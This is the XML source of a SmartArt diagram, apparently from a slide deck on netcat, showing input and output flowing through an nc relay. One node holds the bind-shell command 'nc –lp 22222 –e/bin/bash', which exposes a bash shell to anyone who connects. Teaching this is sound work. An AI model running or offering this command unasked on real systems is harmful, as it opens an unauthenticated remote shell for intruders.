            <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B55A0397-18DB-154D-B0D6-867EEAD4C60A}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{85559D4A-4F97-A940-AA60-B2E6771606B3}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2699087A-0A9E-4145-88A5-0C143E125DC5}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{ACF5EF81-A364-4344-A553-9272E523082A}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2C430B34-A02D-E343-980B-85DF571953C1}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{26824F3D-43D5-1841-976D-10F466215FCE}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{9F6E4E51-ABA0-D240-9CA9-A9A46F9A5E49}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6C7D9235-427F-6B42-AF81-031433C4C664}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6B29B8A2-FC3A-D24A-9535-736A53E80E1B}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{FAC6F8F9-EE48-FE44-8B69-A0BB7C32A593}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C23B08BC-CB26-1544-A26B-AE3B1C0B9402}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{5CEC1676-E269-254C-8D09-6CDCD5DF61E1}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{CD0F3D6A-A6D1-1C42-A027-0E7085334F30}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0F6EB289-AFA4-1646-AB66-A6A443FCED48}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{CC557F8B-4BE7-4A46-8C8F-7CCB065292F2}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}"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5415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8A1AC3E8-9890-D641-987E-C108C21E6B05}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{DCB868F6-F633-BA43-A904-F0F991A20736}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{D5BAB05A-F961-0945-AFD8-6C5827A4E565}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{28DAA166-0F31-454A-8A72-1B97EAEB8E70}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{128B0D4E-77BF-584F-B5C4-E693E8743DF7}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{EA51C907-0E22-B843-9221-725D56A2E69B}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{91581BD3-3609-B649-AEC7-B99C4D04078B}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F8985753-30E7-2C4F-9A84-6B21EFD25010}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F1A9B0A4-781B-4D4C-9688-CBA4DC18264A}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{01C207C1-196C-774B-97BB-BBFC2ADFBB59}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{010658F2-10C9-9B48-B39E-C3967C07903C}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{D229034A-2D6D-6E41-A9B7-4C0FAED3480C}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6FF8A4B0-A01C-5F45-BB4F-C8A0EBB5C61C}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{325A356A-84D0-C646-828A-8AD27D5380AD}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C71F126F-185F-DD4E-9267-B706007C6EC7}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/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5415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
